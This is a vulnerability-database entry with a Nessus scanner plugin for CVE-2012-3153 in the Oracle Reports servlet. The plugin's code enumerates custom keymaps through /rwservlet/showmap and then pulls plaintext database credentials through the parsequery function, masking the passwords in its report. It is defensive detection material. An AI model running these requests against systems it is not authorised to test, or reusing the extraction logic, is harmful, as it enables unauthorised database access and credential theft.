6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
9.3 High
AI Score
Confidence
High
0.974 High
EPSS
Percentile
99.9%
Nessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(73120);
script_version("1.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/05/28");
script_cve_id("CVE-2012-3153");
script_bugtraq_id(55961);
script_xref(name:"EDB-ID", value:"31253");
script_name(english:"Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure");
script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web application that exposes database
credentials.");
script_set_attribute(attribute:"description", value:
"Nessus was able to exploit a flaw in the Oracle Reports servlet
parsequery function, and was able to retrieve the plaintext database
credentials for one or more users. A remote attacker can exploit this
vulnerability to gain unauthorized database access.");
# http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f");
# https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch per the vendor's advisory.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3153");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16");
script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("oracle_reports_detect.nbin");
script_require_keys("www/oracle_reports");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 8888);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");
appname = "Oracle Reports";
port = get_http_port(default:8888);
install = get_install_from_kb(
appname:'oracle_reports',
port:port,
exit_on_fail:TRUE
);
# try and obtain a list of keymaps
show_keymaps_uri = install['dir'] + '/rwservlet/showmap';
res = http_send_recv3(method:"GET",
item:show_keymaps_uri,
port:port,
exit_on_fail:TRUE);
if ("Reports Servlet Key Map" >!< res[2]) exit(0, "Unable to access Oracle Reports showmap function via "+build_url(port:port, qs:show_keymaps_uri)+".");
lines = split(res[2], sep:'\n', keep:FALSE);
count = 0;
custom_keymaps = make_list();
ignorable_keymaps = make_list(
'%ENV_NAME%',
'barcodepaper',
'barcodeweb',
'breakbparam',
'charthyperlink_ias',
'charthyperlink_ids',
'distributionpaper',
'express',
'orqa',
'parmformjsp',
'pdfenhancements',
'report_defaultid',
'report_secure',
'run',
'runp',
'tutorial',
'xmldata'
);
# get a list of non-default custom keymaps
foreach line (lines)
{
if ("OraInstructionText" >!< line) continue;
# table contains name the value, we want to skip over the values
count++;
if (!(count%2)) continue;
item = eregmatch(pattern:"OraInstructionText>([^<]+)<", string:line);
if (!isnull(item) && !isnull(item[1]))
{
keymap = chomp(item[1]);
ignore = FALSE;
foreach map (ignorable_keymaps)
if (map == keymap) ignore = TRUE;
if (!ignore)
custom_keymaps = make_list(custom_keymaps, keymap);
}
}
if (max_index(custom_keymaps) == 0) exit(0, "Failed to access Oracle Reports showmap function at "+build_url(port:port, qs:show_keymaps_uri)+".");
report = '';
parsequery_uri = install['dir'] + '/rwservlet/parsequery?';
foreach map (custom_keymaps)
{
res = http_send_recv3(method:"GET",
item:parsequery_uri + map,
port:port,
exit_on_fail:TRUE);
item = eregmatch(pattern:"userid=([^/]+)/([^@]+)@([^ \t]+)([ \t]|$)",
string:res[2]);
if (!isnull(item) && !isnull(item[1]) && !isnull(item[2]) && !isnull(item[3]))
{
pass = chomp(item[2]);
# mask actual password except for first and last characters.
if (strlen(pass) < 2) pass = crap(data:'*', length:6);
else pass = strcat(pass[0], crap(data:'*', length:6), pass[strlen(pass)-1]);
report += '\n Username : ' + data_protection::sanitize_user_enum(users:chomp(item[1])) +
'\n Password : ' + pass +
'\n Database : ' + chomp(item[3]) + '\n';
}
}
if (report != '')
{
report = '\nNessus was able to enumerate the following logins : \n' + report;
if (report_verbosity > 0) security_warning(port:port, extra:report);
else security_warning(port);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Oracle Reports", build_url(port:port, qs:install['dir'] + '/rwservlet'));
Vendor | Product | Version | CPE |
---|---|---|---|
oracle | fusion_middleware | cpe:/a:oracle:fusion_middleware |